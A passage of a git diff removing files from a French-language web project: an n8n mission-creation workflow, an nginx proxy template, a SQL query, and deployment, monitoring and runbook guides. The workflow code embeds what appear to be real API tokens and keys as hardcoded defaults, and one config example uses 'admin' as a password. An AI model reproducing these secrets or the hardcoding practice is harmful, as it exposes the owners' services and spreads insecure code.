'Tpuww59PJKsrGNQJB',\n OUTLINE_API_URL: missionData.config?.OUTLINE_API_URL || input?.config?.OUTLINE_API_URL || 'https://chapitre.slm-lab.net/api',\n OUTLINE_API_TOKEN: missionData.config?.OUTLINE_API_TOKEN || input?.config?.OUTLINE_API_TOKEN || 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN',\n MISSION_API_URL: missionData.config?.MISSION_API_URL || input?.config?.MISSION_API_URL || 'https://hub.slm-lab.net',\n N8N_API_KEY: missionData.config?.N8N_API_KEY || input?.config?.N8N_API_KEY || 'LwgeE1ntADD20OuWC88S3pR0EaO7FtO4'\n },\n creatorId: missionData.creatorId || input?.creatorId\n};\n\n// Log the output for debugging\nconsole.log('Merge Paths - Output:', {\n hasLogoUrl: !!output.logoUrl,\n attachmentUrlsCount: output.attachmentUrls.length,\n hasAttachments: output.hasAttachments,\n skipIntegrations: output.skipIntegrations,\n hasMissionProcessed: !!output.missionProcessed,\n hasConfig: !!output.config,\n missionName: output.missionProcessed?.name,\n missionType: output.missionProcessed?.missionType,\n services: output.missionProcessed?.services\n});\n\nreturn { json: output };" - }, - "name": "Merge Paths", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 0, - 600 - ], - "id": "7d8692fa-9e3c-4c57-8995-36bb58a33345" - }, - { - "parameters": { - "functionCode": "// Get the input from the previous node\nconst input = $input.item.json;\n\n// Log the full input for debugging\nconsole.log('Set Logo Path - Full Input:', JSON.stringify(input, null, 2));\n\n// Get sanitizedName from Process Mission Data node\nconst missionData = $node['Process Mission Data']?.json?.missionProcessed || {};\nconst sanitizedName = missionData.sanitizedName || '';\n\n// Construct the path using sanitizedName\nconst logoPath = sanitizedName ? `${sanitizedName}/logo.png` : '';\n\n// Construct the full URL using the MinIO endpoint\nconst logoUrl = logoPath ? `https://dome-api.slm-lab.net/missions/${logoPath}` : '';\n\n// Log the output for debugging\nconsole.log('Set Logo Path - Output:', { \n sanitizedName,\n logoPath, \n logoUrl,\n hasMissionData: !!missionData,\n missionDataKeys: Object.keys(missionData)\n});\n\n// Return both the path and URL\nreturn {\n logoPath,\n logoUrl,\n ...input // Preserve all other input data\n};" - }, - "id": "d8c15a4c-4d2b-4a15-8538-eec70dc7e898", - "name": "Set Logo Path", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - -300, - 480 - ] - } - ], - "pinData": {}, - "connections": { - "Process Mission Data": { - "main": [ - [ - { - "node": "Decode Logo Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Decode Logo Data": { - "main": [ - [ - { - "node": "Debug Binary Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Debug Binary Data": { - "main": [ - [ - { - "node": "S3 Upload Logo", - "type": "main", - "index": 0 - } - ] - ] - }, - "S3 Upload Logo": { - "main": [ - [ - { - "node": "Set Logo Path", - "type": "main", - "index": 0 - } - ] - ] - }, - "Set Logo Path": { - "main": [ - [ - { - "node": "Process Upload Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Upload Results": { - "main": [ - [ - { - "node": "Check Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "Check Attachments": { - "main": [ - [ - { - "node": "IF Has Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Has Attachments": { - "main": [ - [ - { - "node": "Process Attachment Data", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Empty Attachment Result", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Attachment Data": { - "main": [ - [ - { - "node": "S3 Upload Attachments", - "type": "main", - "index": 0 - } - ] - ] - }, - "S3 Upload Attachments": { - "main": [ - [ - { - "node": "Get Keycloak Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Empty Attachment Result": { - "main": [ - [ - { - "node": "Get Keycloak Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Get Keycloak Token": { - "main": [ - [ - { - "node": "Process Token", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Token": { - "main": [ - [ - { - "node": "Debug Service Data", - "type": "main", - "index": 0 - } - ] - ] - }, - "Debug Service Data": { - "main": [ - [ - { - "node": "Merge Paths", - "type": "main", - "index": 0 - } - ] - ] - }, - "Merge Paths": { - "main": [ - [ - { - "node": "IF Run Integrations", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Run Integrations": { - "main": [ - [ - { - "node": "IF Needs Git Repository", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Combine Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "IF Needs Git Repository": { - "main": [ - [ - { - "node": "Create Git Repository", - "type": "main", - "index": 0 - } - ], - [ - { - "node": "Create Leantime Project", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Git Repository": { - "main": [ - [ - { - "node": "Create Leantime Project", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Leantime Project": { - "main": [ - [ - { - "node": "Create Documentation Collection", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create Documentation Collection": { - "main": [ - [ - { - "node": "Create RocketChat Channel", - "type": "main", - "index": 0 - } - ] - ] - }, - "Create RocketChat Channel": { - "main": [ - [ - { - "node": "Combine Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Combine Results": { - "main": [ - [ - { - "node": "Save Mission To API", - "type": "main", - "index": 0 - } - ] - ] - }, - "Save Mission To API": { - "main": [ - [ - { - "node": "Process Results", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Results": { - "main": [ - [ - { - "node": "Respond To Webhook", - "type": "main", - "index": 0 - } - ] - ] - }, - "Mission Created Webhook": { - "main": [ - [ - { - "node": "Process Mission Data", - "type": "main", - "index": 0 - } - ] - ] - } - }, - "active": false, - "settings": { - "executionOrder": "v1" - }, - "versionId": "dbf86c0d-d0f8-48c4-95e3-5b6a409a9cee", - "meta": { - "templateCredsSetupCompleted": true, - "instanceId": "575d8de48bd511243817deebddae0cc97d73be64c6c4737e5d4e9caddec881d8" - }, - "id": "pYPCwygv5xatdCQK", - "tags": [] -} \ No newline at end of file diff --git a/caprover-nginx-template-fixed.conf b/caprover-nginx-template-fixed.conf deleted file mode 100644 index 4de76e8..0000000 --- a/caprover-nginx-template-fixed.conf +++ /dev/null @@ -1,137 +0,0 @@ -<% -if (s.forceSsl) { -%> - server { - - listen 80; - - server_name <%-s.publicDomain%>; - - # Used by Lets Encrypt - location /.well-known/acme-challenge/ { - root <%-s.staticWebRoot%>; - } - - # Used by CapRover for health check - location /.well-known/captain-identifier { - root <%-s.staticWebRoot%>; - } - - location / { - return 302 https://$http_host$request_uri; - } - } -<% -} -%> - - -server { - - <% - if (!s.forceSsl) { - %> - listen 80; - <% - } - if (s.hasSsl) { - %> - listen 443 ssl; - http2 on; - ssl_certificate <%-s.crtPath%>; - ssl_certificate_key <%-s.keyPath%>; - <% - } - if (s.logAccessPath) { - %> - access_log <%-s.logAccessPath%>; - <% - } - %> - - client_max_body_size 500m; - - server_name <%-s.publicDomain%>; - - # 127.0.0.11 is DNS set up by Docker, see: - # https://docs.docker.com/engine/userguide/networking/configure-dns/ - # https://github.com/moby/moby/issues/20026 - resolver 127.0.0.11 valid=10s; - # IMPORTANT!! If you are here from an old thread to set a custom port, you do not need to modify this port manually here!! - # Simply change the Container HTTP Port from the dashboard HTTP panel - set $upstream http://172.16.0.102:3000; - - location / { - - <% - if (s.redirectToPath) { - %> - return 302 <%-s.redirectToPath%>$request_uri; - <% - } else { - %> - - <% - if (s.httpBasicAuthPath) { - %> - auth_basic "Restricted Access"; - auth_basic_user_file <%-s.httpBasicAuthPath%>; - <% - } - %> - - # ============================================ - # FIX: Augmenter la limite des headers pour NextAuth - # Résout l'erreur "upstream sent too big header" - # ============================================ - proxy_buffer_size 16k; - proxy_buffers 8 16k; - proxy_busy_buffers_size 32k; - large_client_header_buffers 4 32k; - - # Timeouts pour éviter les timeouts - proxy_connect_timeout 60s; - proxy_send_timeout 60s; - proxy_read_timeout 60s; - - proxy_pass $upstream; - proxy_set_header Host $host; - proxy_set_header X-Real-IP $remote_addr; - proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; - proxy_set_header X-Forwarded-Proto $scheme; - - <% - if (s.websocketSupport) { - %> - proxy_set_header Upgrade $http_upgrade; - proxy_set_header Connection "upgrade"; - proxy_http_version 1.1; - <% - } - %> - - - <% - } - %> - - } - - # Used by Lets Encrypt - location /.well-known/acme-challenge/ { - root <%-s.staticWebRoot%>; - } - - # Used by CapRover for health check - location /.well-known/captain-identifier { - root <%-s.staticWebRoot%>; - } - - error_page 502 /captain_502_custom_error_page.html; - location = /captain_502_custom_error_page.html { - root <%-s.customErrorPagesDirectory%>; - internal; - } -} - - diff --git a/db_query.sql b/db_query.sql deleted file mode 100644 index 7455b4e..0000000 --- a/db_query.sql +++ /dev/null @@ -1 +0,0 @@ -SELECT * FROM "MailCredentials" LIMIT 5; diff --git a/docs/DEPLOYMENT.md b/docs/DEPLOYMENT.md deleted file mode 100644 index 20edf8c..0000000 --- a/docs/DEPLOYMENT.md +++ /dev/null @@ -1,370 +0,0 @@ -# Guide de Déploiement en Production - Neah - -Ce document décrit les procédures pour déployer Neah en production avec Vercel (Next.js) et PostgreSQL auto-hébergé. - -## Architecture de Production - -``` -┌─────────────────┐ -│ Utilisateurs │ -└────────┬────────┘ - │ - ▼ -┌─────────────────┐ -│ Vercel (Next.js)│ -│ - Frontend │ -│ - API Routes │ -└────────┬────────┘ - │ - ├─────────────────┐ - │ │ - ▼ ▼ -┌─────────────────┐ ┌─────────────────┐ -│ PostgreSQL │ │ Redis │ -│ (Auto-hébergé) │ │ (Auto-hébergé) │ -└─────────────────┘ └─────────────────┘ -``` - -## Prérequis - -- Un compte Vercel -- Un serveur pour PostgreSQL et Redis (VPS, VM, ou conteneur Docker) -- Accès SSH au serveur de base de données -- Node.js 22+ installé localement (pour les migrations) - -## Étape 1: Configuration PostgreSQL en Production - -### 1.1 Déployer PostgreSQL avec Docker Compose - -Sur votre serveur de production: - -```bash -# Copier le fichier docker-compose.prod.yml -scp docker-compose.prod.yml user@your-server:/opt/neah/ - -# Se connecter au serveur -ssh user@your-server - -# Créer un fichier .env pour les secrets -cd /opt/neah -cat > .env << EOF -POSTGRES_USER=neah_prod_user -POSTGRES_PASSWORD=$(openssl rand -base64 32) -POSTGRES_DB=calendar_db -REDIS_PASSWORD=$(openssl rand -base64 32) -EOF - -# Démarrer les services -docker-compose -f docker-compose.prod.yml up -d - -# Vérifier que les services sont en cours d'exécution -docker-compose -f docker-compose.prod.yml ps -``` - -### 1.2 Configurer l'accès réseau - -**Option A: Tunnel SSH (Recommandé pour Vercel)** - -Depuis votre machine locale ou un serveur bastion: - -```bash -# Créer un tunnel SSH vers PostgreSQL -ssh -L 5432:localhost:5432 -N user@your-server - -# Dans un autre terminal, tester la connexion -psql postgresql://neah_prod_user:password@localhost:5432/calendar_db -``` - -**Option B: Exposer PostgreSQL avec SSL** - -Modifiez `docker-compose.prod.yml` pour activer SSL: - -```yaml -db: - environment: - POSTGRES_INITDB_ARGS: "-E UTF8 --locale=C" - command: > - postgres - -c ssl=on - -c ssl_cert_file=/var/lib/postgresql/server.crt - -c ssl_key_file=/var/lib/postgresql/server.key - volumes: - - postgres_data:/var/lib/postgresql/data - - ./ssl:/var/lib/postgresql -``` - -Puis exposez le port avec un firewall configuré pour n'accepter que les IPs Vercel. - -### 1.3 Créer la base de données et appliquer les migrations - -```bash -# Se connecter au conteneur PostgreSQL -docker exec -it neah-postgres-prod psql -U neah_prod_user -d calendar_db - -# Ou depuis l'extérieur (si accessible) -export DATABASE_URL="postgresql://neah_prod_user:password@your-server:5432/calendar_db" -npx prisma migrate deploy -``` - -## Étape 2: Configuration Vercel - -### 2.1 Créer un projet Vercel - -1. Connectez-vous à [Vercel](https://vercel.com) -2. Importez votre repository GitHub/GitLab -3. Configurez le projet: - - **Framework Preset**: Next.js - - **Build Command**: `npm run build` - - **Output Directory**: `.next` (par défaut) - - **Install Command**: `npm ci` - -### 2.2 Configurer les variables d'environnement - -Dans Vercel Dashboard → Project Settings → Environment Variables, ajoutez: - -#### Variables obligatoires - -```env -# Environnement -NODE_ENV=production -NEXTAUTH_URL=https://votre-domaine.vercel.app -NEXTAUTH_SECRET= - -# Base de données (via tunnel SSH ou URL publique avec SSL) -DATABASE_URL=postgresql://user:password@host:5432/calendar_db?sslmode=require - -# Keycloak -KEYCLOAK_BASE_URL=https://keycloak.example.com -KEYCLOAK_REALM=neah -KEYCLOAK_CLIENT_ID=neah-app -KEYCLOAK_CLIENT_SECRET= -KEYCLOAK_ISSUER=https://keycloak.example.com/realms/neah -NEXT_PUBLIC_KEYCLOAK_ISSUER=https://keycloak.example.com/realms/neah - -# Redis (si accessible depuis Vercel) -REDIS_URL=redis://:password@your-server:6379 -# OU -REDIS_HOST=your-server -REDIS_PORT=6379 -REDIS_PASSWORD= -REDIS_ENCRYPTION_KEY= -``` - -#### Variables optionnelles (selon vos intégrations) - -```env -# Leantime -LEANTIME_API_URL=https://leantime.example.com -LEANTIME_TOKEN= - -# RocketChat -ROCKET_CHAT_TOKEN= -ROCKET_CHAT_USER_ID= -ROCKET_CHAT_CREATE_TOKEN_SECRET= # Required for RocketChat 8.0.2+ (must match CREATE_TOKENS_FOR_USERS_SECRET on RocketChat server) -NEXT_PUBLIC_IFRAME_PAROLE_URL=https://rocketchat.example.com/channel/general - -# N8N -N8N_API_KEY= -N8N_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-created -N8N_ROLLBACK_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-rollback -N8N_DELETE_WEBHOOK_URL=https://brain.slm-lab.net/webhook/mission-delete -NEXT_PUBLIC_API_URL=https://api.slm-lab.net/api - -# Dolibarr -DOLIBARR_API_URL=https://dolibarr.example.com -DOLIBARR_API_KEY= - -# S3 / MinIO -S3_BUCKET=missions -MINIO_S3_UPLOAD_BUCKET_URL=https://dome-api.slm-lab.net -MINIO_AWS_REGION=us-east-1 -MINIO_AWS_S3_UPLOAD_BUCKET_NAME=missions -MINIO_ACCESS_KEY= -MINIO_SECRET_KEY= - -# Iframes (selon vos besoins) -NEXT_PUBLIC_IFRAME_CARNET_URL=https://carnet.example.com -NEXT_PUBLIC_IFRAME_DRIVE_URL=https://drive.example.com -# ... (voir .env.example pour la liste complète) -``` - -### 2.3 Configurer le domaine personnalisé (optionnel) - -1. Dans Vercel Dashboard → Settings → Domains -2. Ajoutez votre domaine -3. Configurez les enregistrements DNS selon les instructions Vercel - -## Étape 3: Migrations Prisma en Production - -### 3.1 Préparer les migrations - -```bash -# Vérifier l'état des migrations -npx prisma migrate status - -# Créer une nouvelle migration (si nécessaire) -npx prisma migrate dev --name nom_de_la_migration -``` - -### 3.2 Appliquer les migrations en production - -**Méthode 1: Via Vercel Build Hook (Recommandé)** - -Créez un script de migration dans `package.json`: - -```json -{ - "scripts": { - "migrate:deploy": "prisma migrate deploy", - "postbuild": "npm run migrate:deploy" - } -} -``` - -**Méthode 2: Manuellement avant chaque déploiement** - -```bash -# Depuis votre machine locale (avec tunnel SSH actif) -export DATABASE_URL="postgresql://user:password@localhost:5432/calendar_db" -npx prisma migrate deploy -``` - -**Méthode 3: Via GitHub Actions (CI/CD)** - -Créez `.github/workflows/migrate.yml`: - -```yaml -name: Database Migrations - -on: - push: - branches: [main] - -jobs: - migrate: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - uses: actions/setup-node@v3 - with: - node-version: '22' - - run: npm ci - - run: npx prisma migrate deploy - env: - DATABASE_URL: ${{ secrets.DATABASE_URL }} -``` - -## Étape 4: Vérification et Tests - -### 4.1 Vérifier la connexion à la base de données - -```bash -# Tester la connexion PostgreSQL -psql $DATABASE_URL -c "SELECT version();" - -# Vérifier les tables Prisma -npx prisma db pull -``` - -### 4.2 Vérifier les services externes - -- Testez l'authentification Keycloak -- Vérifiez la connexion Redis (si utilisée) -- Testez les intégrations (Leantime, RocketChat, etc.) - -### 4.3 Tests de bout en bout - -1. Accédez à votre application Vercel -2. Testez la connexion -3. Testez les fonctionnalités critiques: - - Création de compte - - Authentification - - Création de mission - - Upload de fichiers - - Notifications - -## Étape 5: Monitoring et Maintenance - -### 5.1 Logs Vercel - -- Consultez les logs dans Vercel Dashboard → Deployments → [Déploiement] → Logs -- Configurez des alertes pour les erreurs - -### 5.2 Monitoring PostgreSQL - -```bash -# Vérifier l'état de PostgreSQL -docker exec neah-postgres-prod pg_isready - -# Vérifier l'utilisation des ressources -docker stats neah-postgres-prod - -# Vérifier les connexions actives -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT count(*) FROM pg_stat_activity;" -``` - -### 5.3 Sauvegardes - -**Sauvegarde PostgreSQL:** - -```bash -# Sauvegarde complète -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_$(date +%Y%m%d).sql - -# Sauvegarde avec compression -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > backup_$(date +%Y%m%d).sql.gz -``` - -**Restauration:** - -```bash -# Restaurer depuis une sauvegarde -cat backup_20240112.sql | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db -``` - -## Procédures de Rollback - -### Rollback Vercel - -1. Dans Vercel Dashboard → Deployments -2. Trouvez le déploiement précédent -3. Cliquez sur "..." → "Promote to Production" - -### Rollback de migration Prisma - -```bash -# Lister les migrations -npx prisma migrate status - -# Rollback manuel (si nécessaire) -# ATTENTION: Testez d'abord en staging ! -psql $DATABASE_URL -f prisma/migrations/[migration_to_rollback]/migration.sql -``` - -## Dépannage - -### Problème: Connexion PostgreSQL échoue depuis Vercel - -- Vérifiez que le tunnel SSH est actif (si utilisé) -- Vérifiez les credentials dans Vercel -- Vérifiez les règles de firewall -- Testez la connexion depuis votre machine locale - -### Problème: Migrations échouent - -- Vérifiez que `DATABASE_URL` est correcte -- Vérifiez les permissions de l'utilisateur PostgreSQL -- Consultez les logs: `npx prisma migrate deploy --verbose` - -### Problème: Erreurs NextAuth - -- Vérifiez que `NEXTAUTH_URL` correspond à votre domaine Vercel -- Vérifiez que `NEXTAUTH_SECRET` est défini -- Vérifiez la configuration Keycloak - -## Ressources - -- [Documentation Vercel](https://vercel.com/docs) -- [Documentation Prisma](https://www.prisma.io/docs) -- [Documentation NextAuth](https://next-auth.js.org) -- [Documentation Docker Compose](https://docs.docker.com/compose/) diff --git a/docs/OBSERVABILITY.md b/docs/OBSERVABILITY.md deleted file mode 100644 index 9dbcc74..0000000 --- a/docs/OBSERVABILITY.md +++ /dev/null @@ -1,369 +0,0 @@ -# Observabilité et Monitoring - Neah - -Ce document décrit la stratégie d'observabilité pour Neah en production. - -## Vue d'ensemble - -L'observabilité comprend trois piliers: -- **Logs**: Enregistrement des événements et erreurs -- **Métriques**: Mesures de performance et santé du système -- **Traces**: Suivi des requêtes à travers le système - -## 1. Logs - -### 1.1 Logs Vercel - -Vercel fournit des logs intégrés pour chaque déploiement: - -**Accès:** -- Dashboard Vercel → Project → Deployments → [Déploiement] → Logs -- Ou via CLI: `vercel logs [deployment-url]` - -**Types de logs:** -- Build logs: Erreurs de compilation -- Runtime logs: Erreurs d'exécution et logs applicatifs -- Edge logs: Logs des fonctions Edge - -**Configuration:** - -Les logs sont automatiquement collectés. Pour améliorer la visibilité: - -```typescript -// lib/logger.ts (déjà présent dans le projet) -import { logger } from '@/lib/logger'; - -// Utilisation -logger.info('User logged in', { userId: user.id }); -logger.error('Database connection failed', { error: error.message }); -logger.warn('Rate limit approaching', { requests: count }); -``` - -### 1.2 Logs PostgreSQL - -**Via Docker:** - -```bash -# Voir les logs PostgreSQL -docker logs neah-postgres-prod -f - -# Logs avec timestamps -docker logs neah-postgres-prod --timestamps -f -``` - -**Configuration PostgreSQL pour les logs:** - -Modifiez `docker-compose.prod.yml`: - -```yaml -db: - environment: - POSTGRES_LOG_STATEMENT: "all" # ou "ddl", "mod", "none" - POSTGRES_LOG_DESTINATION: "stderr" - POSTGRES_LOG_TIMESTAMP: "on" -``` - -### 1.3 Centralisation des logs (Optionnel) - -**Option A: Logtail (Recommandé pour Vercel)** - -1. Créez un compte sur [Logtail](https://logtail.com) -2. Ajoutez l'intégration Vercel -3. Les logs Vercel seront automatiquement envoyés à Logtail - -**Option B: Papertrail** - -1. Créez un compte sur [Papertrail](https://papertrailapp.com) -2. Configurez un endpoint syslog -3. Redirigez les logs Docker vers Papertrail: - -```yaml -# docker-compose.prod.yml -logging: - driver: "syslog" - options: - syslog-address: "tcp://logs.papertrailapp.com:XXXXX" -``` - -**Option C: Self-hosted (Loki + Grafana)** - -Pour une solution auto-hébergée, utilisez Loki + Grafana: - -```yaml -# docker-compose.prod.yml (ajout) -loki: - image: grafana/loki:latest - ports: - - "3100:3100" - volumes: - - loki_data:/loki - -promtail: - image: grafana/promtail:latest - volumes: - - /var/lib/docker/containers:/var/lib/docker/containers:ro - - ./promtail-config.yml:/etc/promtail/config.yml -``` - -## 2. Métriques - -### 2.1 Métriques Vercel - -Vercel fournit des métriques intégrées: - -- **Analytics**: Trafic, pages vues, temps de chargement -- **Speed Insights**: Core Web Vitals, temps de réponse -- **Web Vitals**: LCP, FID, CLS - -**Activation:** - -```bash -npm install @vercel/analytics @vercel/speed-insights -``` - -```typescript -// app/layout.tsx -import { Analytics } from '@vercel/analytics/react'; -import { SpeedInsights } from '@vercel/speed-insights/next'; - -export default function RootLayout({ children }) { - return ( - - - {children} - - - - - ); -} -``` - -### 2.2 Métriques PostgreSQL - -**Via pg_stat_statements:** - -```sql --- Activer l'extension -CREATE EXTENSION IF NOT EXISTS pg_stat_statements; - --- Voir les requêtes les plus lentes -SELECT - query, - calls, - total_exec_time, - mean_exec_time, - max_exec_time -FROM pg_stat_statements -ORDER BY mean_exec_time DESC -LIMIT 10; -``` - -**Via Docker:** - -```bash -# Statistiques du conteneur -docker stats neah-postgres-prod - -# Métriques détaillées -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c " -SELECT - datname, - numbackends, - xact_commit, - xact_rollback, - blks_read, - blks_hit, - tup_returned, - tup_fetched -FROM pg_stat_database -WHERE datname = 'calendar_db'; -" -``` - -### 2.3 Métriques Redis - -```bash -# Statistiques Redis -docker exec neah-redis-prod redis-cli INFO stats - -# Mémoire utilisée -docker exec neah-redis-prod redis-cli INFO memory - -# Commandes les plus utilisées -docker exec neah-redis-prod redis-cli INFO commandstats -``` - -### 2.4 Monitoring avec Prometheus (Optionnel) - -Pour un monitoring avancé, utilisez Prometheus + Grafana: - -```yaml -# docker-compose.prod.yml (ajout) -prometheus: - image: prom/prometheus:latest - volumes: - - ./prometheus.yml:/etc/prometheus/prometheus.yml - - prometheus_data:/prometheus - ports: - - "9090:9090" - -grafana: - image: grafana/grafana:latest - ports: - - "3001:3000" - environment: - - GF_SECURITY_ADMIN_PASSWORD=admin - volumes: - - grafana_data:/var/lib/grafana -``` - -## 3. Alertes - -### 3.1 Alertes Vercel - -Vercel envoie automatiquement des alertes pour: -- Échecs de déploiement -- Erreurs critiques -- Dépassement de quotas - -**Configuration:** -- Dashboard Vercel → Project → Settings → Notifications - -### 3.2 Alertes personnalisées - -**Option A: Sentry (Recommandé)** - -Sentry fournit un suivi d'erreurs avancé: - -```bash -npm install @sentry/nextjs -``` - -```bash -npx @sentry/wizard@latest -i nextjs -``` - -**Option B: Uptime Robot** - -Pour surveiller la disponibilité: -1. Créez un compte sur [Uptime Robot](https://uptimerobot.com) -2. Ajoutez un monitor HTTP pour votre domaine Vercel -3. Configurez les alertes (email, Slack, etc.) - -**Option C: Health Check Endpoint** - -Créez un endpoint de santé: - -```typescript -// app/api/health/route.ts -import { NextResponse } from 'next/server'; -import { getRedisClient } from '@/lib/redis'; -import { prisma } from '@/lib/prisma'; - -export async function GET() { - const checks = { - status: 'ok', - timestamp: new Date().toISOString(), - checks: { - database: 'unknown', - redis: 'unknown', - }, - }; - - // Vérifier PostgreSQL - try { - await prisma.$queryRaw`SELECT 1`; - checks.checks.database = 'ok'; - } catch (error) { - checks.checks.database = 'error'; - checks.status = 'degraded'; - } - - // Vérifier Redis - try { - const redis = getRedisClient(); - await redis.ping(); - checks.checks.redis = 'ok'; - } catch (error) { - checks.checks.redis = 'error'; - checks.status = 'degraded'; - } - - const statusCode = checks.status === 'ok' ? 200 : 503; - return NextResponse.json(checks, { status: statusCode }); -} -``` - -## 4. Dashboards - -### 4.1 Dashboard Vercel - -Le dashboard Vercel fournit: -- Vue d'ensemble des déploiements -- Analytics en temps réel -- Logs intégrés - -### 4.2 Dashboard personnalisé (Grafana) - -Si vous utilisez Prometheus + Grafana: - -1. Créez un dashboard Grafana -2. Ajoutez des panels pour: - - Taux d'erreur HTTP - - Temps de réponse - - Utilisation de la base de données - - Utilisation de Redis - - Métriques applicatives - -## 5. Bonnes pratiques - -### 5.1 Logging - -- **Niveau approprié**: Utilisez `info`, `warn`, `error` selon le contexte -- **Contexte structuré**: Ajoutez des métadonnées pertinentes -- **Pas de secrets**: Ne loguez jamais de mots de passe, tokens, etc. -- **Format cohérent**: Utilisez un format JSON structuré - -```typescript -// ✅ Bon -logger.info('User created', { - userId: user.id, - email: user.email -}); - -// ❌ Mauvais -logger.info(`User created: ${user.password}`); // Ne jamais logger de secrets -``` - -### 5.2 Monitoring - -- **Métriques clés**: Surveillez le taux d'erreur, latence, débit -- **Alertes pertinentes**: Configurez des alertes pour les problèmes critiques uniquement -- **SLIs/SLOs**: Définissez des objectifs de niveau de service - -### 5.3 Performance - -- **APM**: Utilisez un outil d'APM (Application Performance Monitoring) -- **Profiling**: Profilez régulièrement pour identifier les goulots d'étranglement -- **Optimisation**: Optimisez les requêtes lentes identifiées - -## 6. Outils recommandés - -| Outil | Usage | Coût | -|-------|-------|------| -| Vercel Analytics | Métriques intégrées | Gratuit (plan Hobby) | -| Sentry | Suivi d'erreurs | Gratuit (plan Developer) | -| Logtail | Centralisation logs | Payant | -| Uptime Robot | Monitoring uptime | Gratuit (50 monitors) | -| Grafana Cloud | Dashboards | Gratuit (limité) | - -## 7. Checklist de mise en place - -- [ ] Activer Vercel Analytics et Speed Insights -- [ ] Configurer Sentry pour le suivi d'erreurs -- [ ] Créer un endpoint `/api/health` -- [ ] Configurer les alertes Vercel -- [ ] Activer les logs PostgreSQL -- [ ] Configurer un service de centralisation de logs (optionnel) -- [ ] Créer des dashboards de monitoring (optionnel) -- [ ] Documenter les procédures d'alerte diff --git a/docs/RUNBOOK.md b/docs/RUNBOOK.md deleted file mode 100644 index 4225080..0000000 --- a/docs/RUNBOOK.md +++ /dev/null @@ -1,588 +0,0 @@ -# Runbook de Production - Neah - -Ce document contient toutes les procédures opérationnelles pour gérer Neah en production. - -## Table des matières - -1. [Déploiement](#déploiement) -2. [Exploitation quotidienne](#exploitation-quotidienne) -3. [Incidents](#incidents) -4. [Rollback](#rollback) -5. [Maintenance](#maintenance) -6. [Contacts](#contacts) - ---- - -## Déploiement - -### Déploiement standard (Vercel) - -#### Prérequis - -- [ ] Toutes les migrations Prisma sont testées en staging -- [ ] Les variables d'environnement sont à jour dans Vercel -- [ ] Les tests passent localement: `npm run build` - -#### Étapes - -1. **Vérifier l'état actuel** - -```bash -# Vérifier les migrations en attente -npx prisma migrate status - -# Vérifier la configuration -./scripts/verify-vercel-config.sh -``` - -2. **Appliquer les migrations Prisma** - -```bash -# Se connecter au serveur PostgreSQL (via tunnel SSH si nécessaire) -export DATABASE_URL="postgresql://user:password@host:5432/calendar_db" - -# Appliquer les migrations -./scripts/migrate-prod.sh - -# OU manuellement -npx prisma migrate deploy -``` - -3. **Déployer sur Vercel** - -Le déploiement se fait automatiquement via Git: - -```bash -# Pousser les changements vers la branche main -git push origin main - -# Vercel déploiera automatiquement -# Surveiller le déploiement dans Vercel Dashboard -``` - -**OU manuellement via CLI:** - -```bash -vercel --prod -``` - -4. **Vérifier le déploiement** - -- [ ] Vérifier les logs Vercel pour les erreurs -- [ ] Tester l'endpoint de santé: `GET https://votre-domaine.vercel.app/api/health` -- [ ] Tester l'authentification -- [ ] Vérifier les fonctionnalités critiques - -### Déploiement avec migrations critiques - -Si les migrations modifient des données existantes: - -1. **Sauvegarder la base de données** - -```bash -# Sauvegarde complète -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_$(date +%Y%m%d_%H%M%S).sql - -# Sauvegarde compressée -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > backup_$(date +%Y%m%d_%H%M%S).sql.gz -``` - -2. **Tester les migrations en staging** - -3. **Appliquer en production** (voir procédure standard) - -4. **Vérifier l'intégrité des données** - -```sql --- Exemples de vérifications -SELECT COUNT(*) FROM "User"; -SELECT COUNT(*) FROM "Mission"; -SELECT COUNT(*) FROM "Event"; -``` - ---- - -## Exploitation quotidienne - -### Vérifications quotidiennes - -#### 1. Santé de l'application - -```bash -# Vérifier l'endpoint de santé -curl https://votre-domaine.vercel.app/api/health - -# Vérifier les logs Vercel récents -vercel logs --follow -``` - -#### 2. Santé de PostgreSQL - -```bash -# Se connecter au serveur -ssh user@your-server - -# Vérifier l'état du conteneur -docker ps | grep neah-postgres-prod - -# Vérifier les connexions actives -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c " -SELECT count(*) as active_connections -FROM pg_stat_activity -WHERE datname = 'calendar_db'; -" - -# Vérifier l'espace disque -docker exec neah-postgres-prod df -h -``` - -#### 3. Santé de Redis - -```bash -# Vérifier l'état du conteneur -docker ps | grep neah-redis-prod - -# Vérifier la mémoire utilisée -docker exec neah-redis-prod redis-cli INFO memory - -# Vérifier les clés -docker exec neah-redis-prod redis-cli DBSIZE -``` - -#### 4. Métriques Vercel - -- Consulter Vercel Dashboard → 